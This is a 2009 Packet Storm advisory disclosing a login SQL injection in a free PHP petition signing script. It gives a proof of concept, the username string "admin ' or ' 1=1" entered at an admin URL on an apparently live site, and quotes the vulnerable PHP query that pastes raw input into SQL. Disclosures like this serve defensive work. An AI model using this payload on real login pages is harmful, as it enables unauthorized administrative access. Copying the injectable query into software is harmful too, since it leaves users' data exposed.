Free PHP Petition Signing Script SQL Injection

2009-03-27T00:00:00
ID PACKETSTORM:76115
Type packetstorm
Reporter Qabandi
Modified 2009-03-27T00:00:00

Description

                                        
                                            ` || || | ||   
o_,_7 _|| . _o_7 _|| q_|_|| o_w_,  
( : / (_) / ( .   
  
  
######################################################  
# Free PHP Petition Signing Script Release #  
# Login SQL injection #  
######################################################  
# Qabandi | iqa[a]hotmail.fr #  
From Kuwait, Peace.  
Salamz: Killer Hack, Ghost-R00t, Mr.Mn7os, Cyb3rT  
######################################################  
Download: http://www.rediscussed.com/2008/01/18/free-php-petition-signing-script-release/  
------------------------------------------------------  
-:PoC:-  
  
  
http://usa-homeland.org/pet/signing_system-admin  
  
Username: admin ' or ' 1=1  
Password: nothing  
  
  
------------vuln--code---------(./signing_system-admin/index.php)  
  
$query = mysql_query("SELECT username,password FROM `accounts` WHERE username='$username' AND password='$password'", $conn) or die(mysql_error());  
  
------------------------------------  
  
  
`